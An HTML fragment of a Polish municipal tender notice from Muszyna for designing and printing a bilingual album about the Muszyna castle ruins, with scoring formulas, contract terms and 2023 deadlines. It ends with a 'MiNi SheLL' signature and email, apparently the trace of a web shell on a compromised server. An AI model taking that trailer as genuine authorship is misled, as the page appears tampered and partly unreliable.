class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę – 60 pkt<br/>b)	Kryterium nr 2: Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia. – 40 pkt<br/><br/>Punkty przyznawane za kryterium „Cena oferty (z podatkiem VAT)” oraz „Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia” będą liczone wg następującego wzoru:<br/><br/>Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę <br/>Wzór: C = [(Cn/Cb)*60]<br/>C – łączna liczba punktów otrzymanych za kryterium cena brutto<br/>Cn – cena najniższa brutto<br/>Cb – cena wynikająca z oferty badanej brutto<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/><br/>Kryterium nr 2: Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia.<br/><br/>Punktacja za doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia przyznane zostanie jeżeli Wykonawca wykaże, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert wykonał należycie zadanie polegające na opracowaniu tekstowym i graficznym materiałów promocyjnych.<br/>Punktacja za w/w doświadczenie przyznawana będzie w następujący sposób:<br/><br/>Wykonanie 1 opracowania w powyższym zakresie - 10 pkt <br/>Wykonanie 2 - 3 opracowań w powyższym zakresie - 20 pkt <br/>Wykonanie 4 - 5 opracowań w powyższym zakresie - 30 pkt <br/>Wykonanie 6 i więcej opracowań w powyższym zakresie - 40 pkt <br/><br/>W celu otrzymania punktów w ramach niniejszego kryterium z treści przedłożonych dokumentów musi jednoznacznie wynikać, że wykazane zadania polegały na opracowaniu tekstowym i graficznym materiałów promocyjnych i zostały wykonane należycie.<br/><br/>Zamawiający przyzna wykonawcy 0 pkt w ramach niniejszego kryterium w następujących sytuacjach: <br/>1) nieprzedłożenia wraz z ofertą dowodów potwierdzających, że wykazane opracowania tekstowe i graficzne materiałów promocyjnych zostały wykonane należycie,<br/>2) niewykazania doświadczenia w ww. zakresie.<br/><br/>UWAGA: <br/>Dowody potwierdzające, że wykazane opracowania tekstowe i graficzne materiałów promocyjnych opracowane zostały w okresie ostatnich 5 lat przed upływem terminu składania ofert i wykonane zostały należycie, muszą zostać załączone przez wykonawcę do oferty, gdyż dokumenty te nie podlegają złożeniu ani uzupełnieniu na późniejszym etapie postępowania o udzielenie zamówienia publicznego<br/><br/>Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+D<br/>P – ostateczna liczba punktów.<br/>C - liczba punktów otrzymana za kryterium cena brutto.<br/>D - liczba punktów otrzymana za kryterium „Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3 – Album o Muszyńskim Zamku<br/>Przedmiotem zamówienia jest przygotowanie przez Wykonawcę projektu graficznego, a następnie skład, przygotowanie do druku, druk i dostawa albumu o zamku w Muszynie i innych zabytkach Gminy Muszyna oraz Sabinova (SK). <br/>Nakład: 3000 egz.<br/>Format: 21x21 cm, <br/>Oprawa: Twarda + folia mat z lakierem wybiórczym. <br/>Środek: 96 stron, pełen zadruk, papier kreda 150g/m2, szyty, plus wklejki I wyklejki.<br/>ISBN: Album powinien posiadać numer ISBN, który zapewnia Wykonawca.<br/><br/>Zamówienie obejmuje: opracowanie merytoryczne, w tym tekstowe w języku polskim (z korektą polonistyczną), tłumaczenie na język słowacki, opracowanie graficzne, zakup map, prawa autorskie do opracowanej dokumentacji, aktualne i archiwalne zdjęcia, skład, wydruk, dostawa gotowych materiałów do Zamawiającego. Materiał będzie zawierał historyczne i współczesne zdjęcia ruin zamku w Muszynie, ryciny i reprodukcje. Dodatkowo w wydawnictwie zawarte zostaną zdjęcia innych zabytków dawnego Państwa Muszyńskiego oraz współczesne atrakcje gm. Muszyna i Sabinova.<br/>Zawartość merytoryczna przedstawiająca historię muszyńskiej warowni (nawiązującą m.in. do badań archeologicznych) i zabytków architektonicznych historycznego Państwa Muszyńskiego (m.in. zabudowy dworskiej, mieszkalnej oraz cerkiewnej). Publikacja ma zawierać nie mniej niż 100 zdjęć (pełny kolor, w różnych porach roku), ilustracje pokazujące współczesny oraz historyczny wygląd obiektów, rysunki, fotografie współczesne i archiwalne, grafika archiwalna, ryciny. Ilustracje powinny nawiązywać (być spójne) do tekstu. Stylizowana mapa dawnego Państwa Muszyńskiego, zawierająca lokalizację opisanych obiektów. Mapa wykonana w skali pomiędzy 1:150 000, a 1:200 000. <br/>Zdjęcia wykorzystane w albumie muszą być wykonane profesjonalnie. Jakość zdjęć będzie weryfikowana pod względem jakości technicznej, właściwej dla zdjęć wykorzystywanych w publikacjach (m.in. ostrość, światło) i merytorycznej (zgodnie ze wskazaniem Zamawiającego). Wykonawca zobowiązany jest do dostarczenia Zamawiającemu minimum 400 różnych zdjęć wykonanych w lokalizacjach przeznaczonych do umieszczenia w albumie, z których Zamawiający dokona wyboru minimum 100 zdjęć do umieszczenia w albumie.<br/>Teksty i materiały graficzne (zdjęcia) umieszczone w albumie w zakresie koniecznym do wykonania zamówienia muszą być wolne od wad prawnych, nie naruszać praw osób trzecich oraz nie być ograniczone w żadnym zakresie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79800000-2 - Usługi drukowania i powiązane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79810000-5 - Usługi drukowania</p> <p class="mb-0">79820000-8 - Usługi związane z drukowaniem</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">79821000-5 - Drukarskie usługi wykańczalnicze</p> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <p class="mb-0">79960000-1 - Usługi fotograficzne i pomocnicze</p> <p class="mb-0">92310000-7 - Usługi tworzenia dzieł artystycznych i literackich oraz przekładu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę – 60 pkt<br/>b)	Kryterium nr 2: Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia. – 40 pkt<br/><br/>Punkty przyznawane za kryterium „Cena oferty (z podatkiem VAT)” oraz „Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia” będą liczone wg następującego wzoru:<br/><br/>Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę <br/>Wzór: C = [(Cn/Cb)*60]<br/>C – łączna liczba punktów otrzymanych za kryterium cena brutto<br/>Cn – cena najniższa brutto<br/>Cb – cena wynikająca z oferty badanej brutto<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/><br/>Kryterium nr 2: Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia.<br/><br/>Punktacja za doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia przyznane zostanie jeżeli Wykonawca wykaże, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert wykonał należycie zadanie polegające na opracowaniu tekstowym i graficznym materiałów promocyjnych.<br/>Punktacja za w/w doświadczenie przyznawana będzie w następujący sposób:<br/><br/>Wykonanie 1 opracowania w powyższym zakresie - 10 pkt <br/>Wykonanie 2 - 3 opracowań w powyższym zakresie - 20 pkt <br/>Wykonanie 4 - 5 opracowań w powyższym zakresie - 30 pkt <br/>Wykonanie 6 i więcej opracowań w powyższym zakresie - 40 pkt <br/><br/>W celu otrzymania punktów w ramach niniejszego kryterium z treści przedłożonych dokumentów musi jednoznacznie wynikać, że wykazane zadania polegały na opracowaniu tekstowym i graficznym materiałów promocyjnych i zostały wykonane należycie.<br/><br/>Zamawiający przyzna wykonawcy 0 pkt w ramach niniejszego kryterium w następujących sytuacjach: <br/>1) nieprzedłożenia wraz z ofertą dowodów potwierdzających, że wykazane opracowania tekstowe i graficzne materiałów promocyjnych zostały wykonane należycie,<br/>2) niewykazania doświadczenia w ww. zakresie.<br/><br/>UWAGA: <br/>Dowody potwierdzające, że wykazane opracowania tekstowe i graficzne materiałów promocyjnych opracowane zostały w okresie ostatnich 5 lat przed upływem terminu składania ofert i wykonane zostały należycie, muszą zostać załączone przez wykonawcę do oferty, gdyż dokumenty te nie podlegają złożeniu ani uzupełnieniu na późniejszym etapie postępowania o udzielenie zamówienia publicznego<br/><br/>Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+D<br/>P – ostateczna liczba punktów.<br/>C - liczba punktów otrzymana za kryterium cena brutto.<br/>D - liczba punktów otrzymana za kryterium „Doświadczenie które wykonawca wykazuje do wykonania niniejszego zamówienia”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany umowy (Zadanie nr 1 - Zadanie nr 3)<br/>1.	Wszelkie zmiany treści niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.	Zamawiający zgodnie z postanowieniami art. 455 ust. 1 pkt 1 ustawy Pzp przewiduje możliwość zmian umowy w następującym zakresie i w następujących warunkach wprowadzenia tych zmian termin wykonania zamówienia, o którym mowa w § 4 ust. 2 niniejszej umowy, może zostać przedłużony o czas trwania okoliczności nadzwyczajnych uniemożliwiających wykonanie przedmiotu umowy i jeśli dotyczy o czas niezbędny do usunięcia przeszkody uniemożliwiającej wykonanie przedmiotu umowy, powstałej w związku z okolicznościami nadzwyczajnymi, o których mowa w:<br/>a)	siły wyższej - rozumianej jako zdarzenie nadzwyczajne, zewnętrzne, niemożliwe do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie przedmiotu umowy. W razie wystąpienia siły wyższej strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałej na skutek działania siły wyższej,<br/>b)	okoliczności leżących po stronie Zamawiającego i nie wynikających z przyczyn leżących po stronie Wykonawcy (np. wstrzymanie, zawieszenie, przerwa w realizacji),<br/>c)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,<br/>d)	przyczyn niezależnych od którejkolwiek ze stron, które w szczególności dotyczyć będą uwarunkowań formalno-prawnych.<br/><br/>Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, w tym ewentualne treści dotyczące zmian do umowy, stanowią załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-03 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/muszyna</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-03 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zad 1–Zad 3<br/>1.Wszystkie materiały niezbędne do wykonania mapy, folderu i albumu dostarcza Wykonawca tj.teksty,zdjęcia,mapy,ryciny,grafiki tłumaczenie na język słowacki.<br/>2.Wykonawca zobowiązany jest do przedłożenia do korekty Zamawiającemu teksty, zdjęcia, grafiki,projekt graficzny,Zamawiający ma prawo dokonać,co najmniej 3korekt przekazanych materiałów przez Wykonawcę.Zamawiający dokona każdej korekty w terminie do 4dni roboczych licząc od dnia przekazania materiałów do korekty przez Wykonawcę. Wykonawca dodatkowo wykona próbny wydruk projektu graficznego mapy, folderu i albumu które przedłoży Zamawiającemu do ostatecznej akceptacji przed drukiem.W przypadku nie zaakceptowania przez Zamawiającego przedstawionego projektu graficznego oraz wydruków Wykonawca na własny koszt dokona niezbędnych zmian w terminie wskazanym przez Zamawiającego.<br/>3.Wykonawca zobowiązany jest zapewnić podczas transportu takie zabezpieczenie map, folderu i albumu jakie jest wymagane, aby nie dopuścić do uszkodzenia lub pogorszenia ich jakości w trakcie transportu.Na każdym opakowaniu umieści tytuł mapy,folderu i album oraz liczbę egzemplarzyw paczce.<br/>4.Wykonawca na swój koszt i swoim staraniem, dostarczy wydrukowane mapy, foldery i albumy do siedziby Zamawiającego w terminie do120dni kalendarzowych liczonych od dnia podpisania umowy.<br/>5.W terminie do120 dni kalendarzowych liczonych od dnia podpisania umowy Wykonawca dostarczy na adres e-mail Zamawiającego kultura@muszyna.pl pliki zawierające mapę,folder i album w formaciePDF zosadzonymi czcionkami umożliwiającymi odczytanie zawartych w publikacjach treści przez osoby z niepełnosprawnością przy użyciu dedykowanego do tego oprogramowania komputerowego <br/>6.W przypadku powierzenia przedmiotu umowy w określonym zakresie Podwykonawcom, Wykonawca za ich działania odpowiada tak jak za własne działania i zaniechania<br/>7.Wykonawca będzie odpowiedzialny za całokształt prac objętych zadaniem zgodnie z zawartą umową. Wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia<br/>8.Wykonawca prac nie może w żadnym przypadku działać na szkodę Zamawiającego<br/>9.Do obowiązków Wykonawcy należy w szczególności:<br/>a)prawidłowe wykonanie wszystkich prac związanych z realizacją przedmiotu umowy,zgodnie z aktualnie obowiązującymi normami i obowiązującymi przepisami<br/>b)zapewnienie wykonywania prac przez pracowników posiadających wymagane kwalifikacje,pod kierownictwem osób posiadających wymagane przygotowanie zawodowe.<br/>10.Wykonawca zobowiązuje się wykonać przedmiot umowy przy zastosowaniu materiałów i urządzeń odpowiadających co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania oraz wymaganiom Zamawiającego<br/>11.Wykonawca gwarantuje wykonanie przedmiotu umowy zgodnie z obowiązującymi w tym zakresie przepisami prawa.<br/>12.Wykonawca zobowiązany jest zamieścić na mapach,folderze i albumie:<br/>a)zintegrowane logo programu oraz nazwę funduszu,z którego współfinansowany jest projekt tj.Europejski Fundusz Rozwoju Regionalnego. Nazwa funduszu: Europejski Fundusz Rozwoju Regionalnego może stanowić część zintegrowanego logotypu,ale można ją także umieścić w dolnej części materiału lub dokumentu<br/>b)informację:„Wyłączną odpowiedzialność za zawartość niniejszej publikacji ponoszą jej autorzy i nie może być ona utożsamiana z oficjalnym stanowiskiem Unii Europejskiej”./„Výhradnú zodpovednosť za obsah tejto publikácie nesú jej autori a nedá sa stotožniť s oficiálnym stanoviskom Európskej.”,w języku polskim i języku słowackim<br/>c)informację:„Egzemplarz bezpłatny”/„Nepredajné”,w języku polskim i języku słowackim<br/>Wykluczeniu podlega również Wykonawca o którym mowa w art.7ust.1 ustawy z dn. 13.04.22 r.o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>Szczegółowe wymagania dot.OPZ i warunków jego wykonania określono w SWZ i załącznikach stanowiących jego integralną część

Creat By MiNi SheLL
Email: jattceo@gmail.com